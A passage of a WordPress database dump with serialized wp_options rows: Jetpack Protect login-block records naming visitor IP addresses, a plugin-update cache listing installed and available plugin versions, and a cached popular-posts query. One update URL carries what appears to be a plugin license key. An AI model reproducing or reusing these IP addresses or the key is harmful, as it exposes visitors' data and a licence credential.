o current blocks on this IP address (148.113.205.188)\";s:17:\"seconds_remaining\";i:3600;s:16:\"blocked_attempts\";s:7:\"1671436\";s:6:\"expire\";i:1782109346;}','off'),(5644675,'_transient_timeout_jpp_li_7c8c5132ca16c44fb8e30254efdf1114','1782110148','off'),(5644676,'_transient_jpp_li_7c8c5132ca16c44fb8e30254efdf1114','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:45:\"This IP is currently blocked (152.59.203.181)\";s:17:\"seconds_remaining\";i:3491;s:16:\"blocked_attempts\";s:7:\"1671438\";s:6:\"expire\";i:1782110148;}','off'),(5643346,'_transient_timeout_pods_c96de8bb1e7620236325426e6bdd64fa','1782656633','off'),(5643347,'_transient_pods_c96de8bb1e7620236325426e6bdd64fa','a:0:{}','off'),(5644559,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1782103445;s:8:\"response\";a:17:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:5:\"7.105\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.105.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=3490368\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=3490368\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"5.3\";s:16:\"requires_plugins\";a:0:{}}s:25:\"bit-social/bit-social.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/bit-social\";s:4:\"slug\";s:10:\"bit-social\";s:6:\"plugin\";s:25:\"bit-social/bit-social.php\";s:11:\"new_version\";s:6:\"1.15.0\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/bit-social/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/bit-social.1.15.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/bit-social/assets/icon-256x256.gif?rev=3176768\";s:2:\"1x\";s:63:\"https://ps.w.org/bit-social/assets/icon-128x128.gif?rev=3176768\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/bit-social/assets/banner-1544x500.gif?rev=3176768\";s:2:\"1x\";s:65:\"https://ps.w.org/bit-social/assets/banner-772x250.gif?rev=3176768\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.1\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:39:\"button-contact-vr/button-contact-vr.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:31:\"w.org/plugins/button-contact-vr\";s:4:\"slug\";s:17:\"button-contact-vr\";s:6:\"plugin\";s:39:\"button-contact-vr/button-contact-vr.php\";s:11:\"new_version\";s:5:\"5.0.8\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/button-contact-vr/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/button-contact-vr.5.0.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/button-contact-vr/assets/icon-256x256.png?rev=3518581\";s:2:\"1x\";s:70:\"https://ps.w.org/button-contact-vr/assets/icon-128x128.png?rev=3518581\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/button-contact-vr/assets/banner-772x250.png?rev=3462873\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.0\";s:16:\"requires_plugins\";a:0:{}}s:57:\"category-subcategory-list-widget/category-list-widget.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:46:\"w.org/plugins/category-subcategory-list-widget\";s:4:\"slug\";s:32:\"category-subcategory-list-widget\";s:6:\"plugin\";s:57:\"category-subcategory-list-widget/category-list-widget.php\";s:11:\"new_version\";s:3:\"7.3\";s:3:\"url\";s:63:\"https://wordpress.org/plugins/category-subcategory-list-widget/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/category-subcategory-list-widget.7.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:85:\"https://ps.w.org/category-subcategory-list-widget/assets/icon-256x256.png?rev=1364554\";s:2:\"1x\";s:85:\"https://ps.w.org/category-subcategory-list-widget/assets/icon-128x128.png?rev=1364580\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/category-subcategory-list-widget/assets/banner-1544x500.png?rev=1365499\";s:2:\"1x\";s:87:\"https://ps.w.org/category-subcategory-list-widget/assets/banner-772x250.png?rev=1365499\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"8.0\";s:16:\"requires_plugins\";a:0:{}}s:49:\"content-aware-sidebars/content-aware-sidebars.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:36:\"w.org/plugins/content-aware-sidebars\";s:4:\"slug\";s:22:\"content-aware-sidebars\";s:6:\"plugin\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:11:\"new_version\";s:6:\"3.21.3\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/content-aware-sidebars/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/content-aware-sidebars.3.21.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/content-aware-sidebars/assets/icon-256x256.png?rev=1815877\";s:2:\"1x\";s:75:\"https://ps.w.org/content-aware-sidebars/assets/icon-128x128.png?rev=1815877\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/content-aware-sidebars/assets/banner-1544x500.png?rev=1815877\";s:2:\"1x\";s:77:\"https://ps.w.org/content-aware-sidebars/assets/banner-772x250.png?rev=1815877\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.1\";s:16:\"requires_plugins\";a:0:{}}s:35:\"ele-custom-skin/ele-custom-skin.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/ele-custom-skin\";s:4:\"slug\";s:15:\"ele-custom-skin\";s:6:\"plugin\";s:35:\"ele-custom-skin/ele-custom-skin.php\";s:11:\"new_version\";s:5:\"4.3.4\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/ele-custom-skin/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/ele-custom-skin.4.3.4.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:60:\"https://ps.w.org/ele-custom-skin/assets/icon.svg?rev=3536751\";s:3:\"svg\";s:60:\"https://ps.w.org/ele-custom-skin/assets/icon.svg?rev=3536751\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/ele-custom-skin/assets/banner-1544x500.png?rev=3518775\";s:2:\"1x\";s:70:\"https://ps.w.org/ele-custom-skin/assets/banner-772x250.png?rev=3518775\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"8.0\";s:16:\"requires_plugins\";a:0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"4.1.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.4.1.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.gif?rev=3444228\";s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.gif?rev=3444228\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3443226\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3443226\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:31:\"everest-forms/everest-forms.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/everest-forms\";s:4:\"slug\";s:13:\"everest-forms\";s:6:\"plugin\";s:31:\"everest-forms/everest-forms.php\";s:11:\"new_version\";s:5:\"3.5.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/everest-forms/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/everest-forms.3.5.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:58:\"https://ps.w.org/everest-forms/assets/icon.svg?rev=2778675\";s:3:\"svg\";s:58:\"https://ps.w.org/everest-forms/assets/icon.svg?rev=2778675\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/everest-forms/assets/banner-772x250.png?rev=3574130\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:25:\"gtranslate/gtranslate.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/gtranslate\";s:4:\"slug\";s:10:\"gtranslate\";s:6:\"plugin\";s:25:\"gtranslate/gtranslate.php\";s:11:\"new_version\";s:5:\"3.1.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/gtranslate/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/gtranslate.3.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/gtranslate/assets/icon-256x256.png?rev=2595917\";s:2:\"1x\";s:63:\"https://ps.w.org/gtranslate/assets/icon-128x128.png?rev=2595917\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/gtranslate/assets/banner-1544x500.png?rev=3287209\";s:2:\"1x\";s:65:\"https://ps.w.org/gtranslate/assets/banner-772x250.png?rev=3287209\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"6.0.1\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:41:\"w.org/plugins/intuitive-custom-post-order\";s:4:\"slug\";s:27:\"intuitive-custom-post-order\";s:6:\"plugin\";s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";s:11:\"new_version\";s:5:\"3.2.0\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/intuitive-custom-post-order/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/intuitive-custom-post-order.3.2.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/intuitive-custom-post-order/assets/icon-256x256.png?rev=1078797\";s:2:\"1x\";s:80:\"https://ps.w.org/intuitive-custom-post-order/assets/icon-128x128.png?rev=1078797\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/intuitive-custom-post-order/assets/banner-1544x500.png?rev=1209666\";s:2:\"1x\";s:82:\"https://ps.w.org/intuitive-custom-post-order/assets/banner-772x250.png?rev=1078755\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.5.0\";s:6:\"tested\";s:5:\"6.8.5\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:19:\"jetpack/jetpack.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/jetpack\";s:4:\"slug\";s:7:\"jetpack\";s:6:\"plugin\";s:19:\"jetpack/jetpack.php\";s:11:\"new_version\";s:4:\"15.9\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/jetpack/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/jetpack.15.9.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2819237\";s:3:\"svg\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2819237\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/jetpack/assets/banner-1544x500.png?rev=2653649\";s:2:\"1x\";s:62:\"https://ps.w.org/jetpack/assets/banner-772x250.png?rev=2653649\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.9\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:35:\"jetpack-protect/jetpack-protect.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/jetpack-protect\";s:4:\"slug\";s:15:\"jetpack-protect\";s:6:\"plugin\";s:35:\"jetpack-protect/jetpack-protect.php\";s:11:\"new_version\";s:5:\"5.0.0\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/jetpack-protect/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/jetpack-protect.5.0.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/jetpack-protect/assets/icon-256x256.png?rev=2820708\";s:2:\"1x\";s:68:\"https://ps.w.org/jetpack-protect/assets/icon-128x128.png?rev=2820708\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/jetpack-protect/assets/banner-1544x500.png?rev=2735068\";s:2:\"1x\";s:70:\"https://ps.w.org/jetpack-protect/assets/banner-772x250.png?rev=2735068\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.8\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:21:\"newsletter/plugin.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:6:\"plugin\";s:21:\"newsletter/plugin.php\";s:11:\"new_version\";s:5:\"9.2.8\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/newsletter/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/newsletter.9.2.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/newsletter/assets/icon-256x256.png?rev=1052028\";s:2:\"1x\";s:63:\"https://ps.w.org/newsletter/assets/icon-128x128.png?rev=1160467\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/newsletter/assets/banner-1544x500.png?rev=1052027\";s:2:\"1x\";s:65:\"https://ps.w.org/newsletter/assets/banner-772x250.png?rev=1052027\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.1\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.0\";s:16:\"requires_plugins\";a:0:{}}s:13:\"pods/init.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:18:\"w.org/plugins/pods\";s:4:\"slug\";s:4:\"pods\";s:6:\"plugin\";s:13:\"pods/init.php\";s:11:\"new_version\";s:5:\"3.3.9\";s:3:\"url\";s:35:\"https://wordpress.org/plugins/pods/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/plugin/pods.3.3.9.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:49:\"https://ps.w.org/pods/assets/icon.svg?rev=3286397\";s:3:\"svg\";s:49:\"https://ps.w.org/pods/assets/icon.svg?rev=3286397\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:59:\"https://ps.w.org/pods/assets/banner-772x250.png?rev=3286397\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.3\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:41:\"post-views-counter/post-views-counter.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:32:\"w.org/plugins/post-views-counter\";s:4:\"slug\";s:18:\"post-views-counter\";s:6:\"plugin\";s:41:\"post-views-counter/post-views-counter.php\";s:11:\"new_version\";s:6:\"1.7.13\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/post-views-counter/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/post-views-counter.1.7.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/post-views-counter/assets/icon-256x256.png?rev=2973820\";s:2:\"1x\";s:71:\"https://ps.w.org/post-views-counter/assets/icon-128x128.png?rev=2973820\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/post-views-counter/assets/banner-772x250.png?rev=2973820\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"6.3.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.0\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:56:\"<p>Fixes WooCommerce product Quick Edit view saving.</p>\";}s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:37:\"w.org/plugins/wordpress-popular-posts\";s:4:\"slug\";s:23:\"wordpress-popular-posts\";s:6:\"plugin\";s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";s:11:\"new_version\";s:5:\"7.4.0\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/wordpress-popular-posts/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/wordpress-popular-posts.7.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/wordpress-popular-posts/assets/icon-256x256.png?rev=1232659\";s:2:\"1x\";s:76:\"https://ps.w.org/wordpress-popular-posts/assets/icon-128x128.png?rev=1232659\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/wordpress-popular-posts/assets/banner-1544x500.png?rev=2833992\";s:2:\"1x\";s:78:\"https://ps.w.org/wordpress-popular-posts/assets/banner-772x250.png?rev=2833998\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:43:\"ele-custom-skin-pro/ele-custom-skin-pro.php\";O:8:\"stdClass\":6:{s:4:\"slug\";s:19:\"ele-custom-skin-pro\";s:11:\"new_version\";s:5:\"4.2.1\";s:3:\"url\";s:20:\"https://dudaster.com\";s:6:\"plugin\";s:98:\"https://dudaster.com/update.php?pid=ecsprou&key=OEU1MjNEMUYtNjA3QzRDODUtQTNDMUU5QkYtRkIzRkUzQzM%3D\";s:7:\"package\";s:98:\"https://dudaster.com/update.php?pid=ecsprou&key=OEU1MjNEMUYtNjA3QzRDODUtQTNDMUU5QkYtRkIzRkUzQzM%3D\";s:5:\"icons\";a:2:{s:2:\"1x\";s:60:\"https://dudaster.com/assets/images/dudaster-icon-128x128.png\";s:2:\"2x\";s:60:\"https://dudaster.com/assets/images/dudaster-icon-256x256.png\";}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:3:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"5.7\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.5.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:58:\"easy-maintenance-mode-by-wpkoder/easy-maintenance-mode.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:46:\"w.org/plugins/easy-maintenance-mode-by-wpkoder\";s:4:\"slug\";s:32:\"easy-maintenance-mode-by-wpkoder\";s:6:\"plugin\";s:58:\"easy-maintenance-mode-by-wpkoder/easy-maintenance-mode.php\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:63:\"https://wordpress.org/plugins/easy-maintenance-mode-by-wpkoder/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/easy-maintenance-mode-by-wpkoder.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:77:\"https://ps.w.org/easy-maintenance-mode-by-wpkoder/assets/icon.svg?rev=2694266\";s:3:\"svg\";s:77:\"https://ps.w.org/easy-maintenance-mode-by-wpkoder/assets/icon.svg?rev=2694266\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";}s:31:\"elementor-pro/elementor-pro.php\";O:8:\"stdClass\":3:{s:7:\"license\";s:5:\"valid\";s:7:\"expires\";s:10:\"01.01.2030\";s:6:\"plugin\";s:31:\"elementor-pro/elementor-pro.php\";}}s:7:\"checked\";a:28:{s:19:\"akismet/akismet.php\";s:3:\"5.7\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:5:\"7.102\";s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";s:4:\"2.82\";s:25:\"bit-social/bit-social.php\";s:6:\"1.13.3\";s:33:\"bit-social-pro/bit-social-pro.php\";s:7:\"1.13.10\";s:39:\"button-contact-vr/button-contact-vr.php\";s:5:\"5.0.4\";s:57:\"category-subcategory-list-widget/category-list-widget.php\";s:3:\"6.0\";s:23:\"site-mode/site-mode.php\";s:5:\"1.1.1\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:6:\"3.19.3\";s:58:\"easy-maintenance-mode-by-wpkoder/easy-maintenance-mode.php\";s:3:\"1.7\";s:35:\"ele-custom-skin/ele-custom-skin.php\";s:5:\"3.1.7\";s:43:\"ele-custom-skin-pro/ele-custom-skin-pro.php\";s:5:\"3.2.4\";s:23:\"elementor/elementor.php\";s:5:\"3.7.8\";s:31:\"elementor-pro/elementor-pro.php\";s:5:\"3.7.7\";s:31:\"everest-forms/everest-forms.php\";s:5:\"2.0.6\";s:25:\"gtranslate/gtranslate.php\";s:5:\"3.0.9\";s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";s:5:\"3.1.5\";s:21:\"jet-blog/jet-blog.php\";s:5:\"2.3.1\";s:29:\"jet-elements/jet-elements.php\";s:5:\"2.5.8\";s:19:\"jetpack/jetpack.php\";s:6:\"12.0.2\";s:35:\"jetpack-protect/jetpack-protect.php\";s:5:\"1.4.0\";s:25:\"jet-search/jet-search.php\";s:5:\"3.0.3\";s:39:\"jet-smart-filters/jet-smart-filters.php\";s:5:\"3.1.2\";s:21:\"newsletter/plugin.php\";s:5:\"8.0.9\";s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";s:5:\"1.2.3\";s:13:\"pods/init.php\";s:7:\"3.2.8.2\";s:41:\"post-views-counter/post-views-counter.php\";s:5:\"1.4.3\";s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";s:5:\"6.4.0\";}}','off'),(5644775,'_transient_timeout_wpp_bf738b949e164b2ad4e418e5c570bdd7','1782110463','off'),(5644776,'_transient_wpp_bf738b949e164b2ad4e418e5c570bdd7','O:27:\"WordPressPopularPosts\\Query\":3:{s:34:\"\0WordPressPopularPosts\\Query\0query\";s:398:\"SELECT p.ID AS id, p.post_title AS title, p.post_author AS uid, v.pageviews FROM `wp_posts` p INNER JOIN (SELECT SUM(pageviews) AS pageviews, postid FROM `wp_popularpostssummary` WHERE view_datetime >= \'2026-06-21 06:40:03\' GROUP BY postid) v ON p.ID = v.postid WHERE 1 = 1 AND p.post_type IN(\'post\') AND p.post_password = \'\' AND p.post_status = \'publish\'  ORDER BY pageviews DESC LIMIT 5 OFFSET 0;\";s:34:\"\0WordPressPopularPosts\\Query\0posts\";a:0:{}s:36:\"\0WordPressPopularPosts\\Query\0options\";a:23:{s:5:\"title\";s:8:\"Trending\";s:5:\"limit\";s:1:\"5\";s:6:\"offset\";i:0;s:5:\"range\";s:5:\"daily\";s:9:\"time_unit\";s:4:\"hour\";s:13:\"time_quantity\";s:2:\"24\";s:9:\"freshness\";b:0;s:8:\"order_by\";s:5:\"views\";s:9:\"post_type\";s:4:\"post\";s:3:\"pid\";s:0:\"\";s:6:\"author\";s:0:\"\";s:3:\"cat\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:7:\"term_id\";s:0:\"\";s:13:\"shorten_title\";a:3:{s:6:\"active\";b:0;s:6:\"length\";i:25;s:5:\"words\";b:0;}s:12:\"post-excerpt\";a:4:{s:6:\"active\";b:0;s:6:\"length\";i:75;s:11:\"keep_format\";b:0;s:5:\"words\";b:0;}s:9:\"thumbnail\";a:5:{s:6:\"active\";b:0;s:5:\"build\";s:6:\"manual\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:4:\"crop\";b:1;}s:6:\"rating\";b:0;s:9:\"stats_tag\";a:6:{s:13:\"comment_count\";b:0;s:5:\"views\";b:0;s:6:\"author\";b:0;s:4:\"date\";a:2:{s:6:\"active\";b:0;s:6:\"format\";s:6:\"F j, Y\";}s:8:\"category\";b:1;s:8:\"taxonomy\";a:2:{s:6:\"active\";b:0;s:4:\"name\";s:8:\"category\";}}s:6:\"markup\";a:6:{s:11:\"custom_html\";b:1;s:11:\"title-start\";s:41:\"&lt;h4 class=&quot;widget-title&quot;&gt;\";s:9:\"title-end\";s:11:\"&lt;/h4&gt;\";s:9:\"wpp-start\";s:34:\"<ul class=\"wpp-list wpp-midnight\">\";s:7:\"wpp-end\";s:5:\"</ul>\";s:9:\"post-html\";s:151:\"<li style=\"--item-position: {item_position}; --total-items: {total_items};\"><div class=\"item-position\"></div> <div class=\"item-data\">{title}</div></li>\";}s:5:\"theme\";a:2:{s:4:\"name\";s:8:\"midnight\";s:7:\"applied\";b:1;}s:9:\"widget_id\";s:5:\"wpp-2\";s:7:\"id_base\";s:3:\"wpp\";}}','off'),(5644782,'_site_transient_timeout_wp_theme_files_patterns-ffa1257326aadf2c29ef641df800e6c3','1782112477','off'),(5644783,'_site_transient_wp_theme_files_patterns-ffa1257326aadf2c29ef641df800e6c3','a:2:{s:7:\"version\";s:5:\"1.0.1\";s:8:\"patterns\";a:0:{}}','off'),(5644720,'_transient_jpp_li_cd931f98bc71a32605479cb588db1962','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:45:\"This IP is currently blocked (122.183.33.164)\";s:17:\"seconds_remaining\";i:2247;s:16:\"blocked_attempts\";s:7:\"1671439\";s:6:\"expire\";i:1782110521;}','off'),(5644746,'_transient_timeout_jpp_li_40a502612125c0a10afe0014c6abce3c','1782112771','off'),(5644747,'_transient_jpp_li_40a502612125c0a10afe0014c6abce3c','a:5:{s:6:\"status\";s:2:\"ok\";s:3:\"msg\";s:53:\"No current blocks on this IP address (198.235.24.115)\";s:17:\"seconds_remaining\";i:3600;s:16:\"blocked_attempts\";s:7:\"1671440\";s:6:\"expire\";i:1782112771;}','off'),(5644786,'_transient_timeout_jpp_li_191348e5890e714629ffc9223eb0ac13','1782114275','off'),(5644787,'_transient_jpp_li_191348e5890e714629ffc9223eb0ac13','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:44:\"This IP is currently blocked 